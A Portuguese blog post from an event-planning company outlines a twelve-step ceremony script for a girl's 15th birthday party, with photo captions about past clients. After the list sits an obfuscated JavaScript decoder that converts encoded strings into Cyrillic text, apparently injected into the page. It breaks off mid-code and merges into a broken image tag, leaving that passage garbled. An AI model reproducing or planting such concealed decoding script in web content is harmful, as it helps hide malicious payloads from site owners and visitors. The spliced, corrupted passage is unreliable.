Como fazer um cerimonial de 15 anos

  • O cerimonial de 15 anos que a Túlio Pinho Eventos faz, há mais de 15 anos, foi sendo aprimorado ao longo dos anos. Entretanto, isso não quer dizer que temos uma fórmula fixa de faze-lo. Isto porque o roteiro básico pode e deve ter  variações de conformidade com o interesse de nossos clientes, no caso, a debutante e seus pais
  • Na foto abaixo a linda debutante Karen Pinheiro com seus pais, num brinde ao final do seu cerimonial, realizado em 15.3.14, no Espaço Lounge, Jardim Guanabara, Ilha do Governador-RJ, pela Túlio Pinho Eventos. 

No momento dos parabéns Karen fez um brinde com seus pais na mesa do bolo.

  • Por exemplo, um roteiro básico do  cerimonial  poderá seguir  as etapas ou sequência:
  • 1º – Abertura do cerimonial pelo Mestre de Cerimônias-MC, dando as boas vindas a todos os convidados e agradecendo pela presença;
  • 2º - Uma prece de agradecimento a Deus pelo momento;
  • 3º - Um resumo da história da debutante com destaque para os principais pontos, como a data de seu nascimento, local e alguns detalhes de sua personalidade;
  • 4º - A entrada triunfal da debutante, que será recebida por seus pais e apresentada a todos os convidados, representando a sua apresentação à sociedade ;
  • 5º - Representação de mudança de fase de vida da debutante, com oferta de uma jóia a ela por seu pai;
  • 6º - Representação do "adeus a todos os seus brinquedos de criança" com a entrega simbólica de uma boneca ou outro brinquedo para uma ou duas crianças;

DSC02264

  • 7º - Homenagens da debutante a algumas pessoas importantes na sua trajetória de vida até este momento, tais como: amigos; primos; tios e tias; padrinho e madrinha; avós; pai e mãe. (Essa lista pode variar de acordo com o interesse da debutante e de seus pais)
  • 8º - O momento da valsa da debutante com seu pai e algumas outras pessoas (opcional);
  • 9º - Entrada de um rapaz representando o seu futuro "príncipe encantado";
  • 10º - Dança de uma coreografia da debutante com seu "príncipe", representando o "namoro" dela com ele.
  • 11º - Momento surpresa preparado por amigos para a debutante;
  • 12º - Encerramento do cerimonial com o Parabéns para você.

Esse roteiro é o básico, como já explicado,  e portanto poderá ser alterado na conversa que obrigatoriamente haverá entre o Cerimonial, a debutante e seus pais.

function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oaanda-dia-21.9.13.jpg" alt="A linda debutante Amanda durante apresentação do seu cerimonial." width="768" height="1023" /> A linda debutante Amanda durante apresentação do seu cerimonial.

Complementam ainda o cerimonial de 15 anos outros detalhes muito importantes como a preparação da coreografia com pelo menos 8 horas de ensaios e um ensaio geral no local da festa.

Outro detalhe importantíssimo, será a preparação do roteiro musical com a colocação de músicas da escolha da debutante, com assessoria da Túlio Pinho Eventos para os vários momentos do cerimonial.